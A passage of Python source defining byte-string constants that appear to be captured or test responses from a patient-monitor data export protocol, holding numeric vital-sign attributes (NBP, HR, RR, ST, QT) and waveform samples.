b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_9_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_9_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\xaf\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_9_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x04\x58\x00\x04\x00\x07\x04\x52\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x04\x48\x00\x03\x00\x00\x0e\x80\x80\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x04\x2e\x00\x00\x00\x04" \ b"\x04\x28\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xd9\x1f\xd8\x1f\xd8\x1f\xd7\x1f\xd6\x1f\xd5\x1f\xd4" \ b"\x1f\xd3\x1f\xd2\x1f\xd1\x1f\xd0\x1f\xd0\x1f\xd0\x1f\xd1\x1f\xd3" \ b"\x1f\xd4\x1f\xd5\x1f\xd7\x1f\xd8\x1f\xd9\x1f\xdb\x1f\xdc\x1f\xde" \ b"\x1f\xdf\x1f\xe0\x1f\xe2\x1f\xe3\x1f\xe4\x1f\xe5\x1f\xe7\x1f\xe8" \ b"\x1f\xe9\x1f\xeb\x1f\xec\x1f\xed\x1f\xee\x1f\xf0\x1f\xf1\x1f\xf2" \ b"\x1f\xf3\x1f\xf4\x1f\xf5\x1f\xf7\x1f\xf8\x1f\xfa\x1f\xfb\x1f\xfc" \ b"\x1f\xfc\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xf5\x1f\xf6\x1f\xf4\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf4" \ b"\x1f\xf5\x1f\xf4\x1f\xf5\x1f\xf6\x1f\xf6\x1f\xf6\x1f\xf7\x1f\xf5" \ b"\x1f\xf6\x1f\xf7\x1f\xf7\x1f\xf8\x1f\xf9\x1f\xf7\x1f\xf8\x1f\xf8" \ b"\x1f\xf9\x1f\xfa\x1f\xfa\x1f\xf9\x1f\xfa\x1f\xfb\x1f\xfb\x1f\xfc" \ b"\x1f\xfb\x1f\xfb\x1f\xfc\x1f\xfd\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfe" \ b"\x1f\xff\x20\x00\x1f\xff\x1f\xff\x20\x00\x20\x00\x1f\xff\x1f\xfe" \ b"\x20\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x10\x01\xb2\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x09\x6e\x01\x06\x01\x3d\x04\x00\x01\x00\x1f\xe3\x1f\xe1\x1f\xe3" \ b"\x1f\xe1\x1f\xe1\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdd\x1f\xdb\x1f\xd9" \ b"\x1f\xd9\x1f\xd9\x1f\xd9\x1f\xdd\x1f\xdd\x1f\xdd\x1f\xdf\x1f\xdf" \ b"\x1f\xdf\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe5\x1f\xe5\x1f\xe7\x1f\xe9" \ b"\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xef\x1f\xef\x1f\xef" \ b"\x1f\xef\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf3\x1f\xf5\x1f\xf7" \ b"\x1f\xf7\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xfb\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x07\x8e\x00\x01\x00\x4a" \ b"\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40\x06\x0e\x06\x05\x05\xfb" \ b"\x05\xef\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66" \ b"\x05\x4d\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91" \ b"\x04\x78\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05" \ b"\x04\x01\x04\x00\x04\x04\x04\x0b\x04\x18" rsp_wave_9_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x88\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x28\x04\x3e\x04\x57\x04\x76\x04\x99\x04\xc0\x04\xec" \ b"\x05\x1d\x05\x51\x05\x89\x05\xc5\x06\x05\x06\x47\x06\x8c\x06\xd3" \ b"\x07\x1c\x07\x67\x07\xb3\x07\xff\x08\x4c\x08\x99\x08\xe4\x09\x2f" \ b"\x09\x78\x09\xbf\x0a\x03\x0a\x44\x0a\x83\x0a\xbd\x0a\xf3\x0b\x25" \ b"\x0b\x53" rsp_wave_9_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x90\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x20\x8d\x20\x96\x20\x9f\x20\xa8\x20\xad\x20\xab\x20\xa6" \ b"\x20\x9e\x20\x95\x20\x8c\x20\x82\x20\x78\x20\x6e\x20\x63\x20\x59" \ b"\x20\x4f\x20\x45\x20\x3a\x20\x30\x20\x26\x20\x1c\x20\x12\x20\x08" \ b"\x1f\xff\x1f\xf7\x1f\xf3\x1f\xf0\x1f\xee\x1f\xed\x1f\xed\x1f\xec" \ b"\x1f\xec\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xed\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee\x1f\xee" \ b"\x1f\xee\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa0\x84\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x20\x00\x20\x02\x20\x04\x20\x08\x20\x08\x20\x0b" \ b"\x20\x10\x20\x12\x20\x15\x20\x17\x20\x1a\x20\x1c\x20\x1f\x20\x22" \ b"\x20\x25\x20\x27\x20\x2a\x20\x2d\x20\x30\x20\x33\x20\x33\x20\x32" \ b"\x20\x30\x20\x2f\x20\x2a\x20\x28\x20\x24\x20\x22\x20\x1f\x20\x1d" \ b"\x20\x19\x20\x17\x20\x14\x20\x12\x20\x0e\x20\x0c\x20\x0a\x20\x06" \ b"\x20\x03\x20\x01\x1f\xff\x1f\xfe\x1f\xfe\x1f\xfd\x1f\xfd\x1f\xfc" \ b"\x1f\xfc\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb\x1f\xfb" \ b"\x1f\xfb\x1f\xfd\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc\x1f\xfc" \ 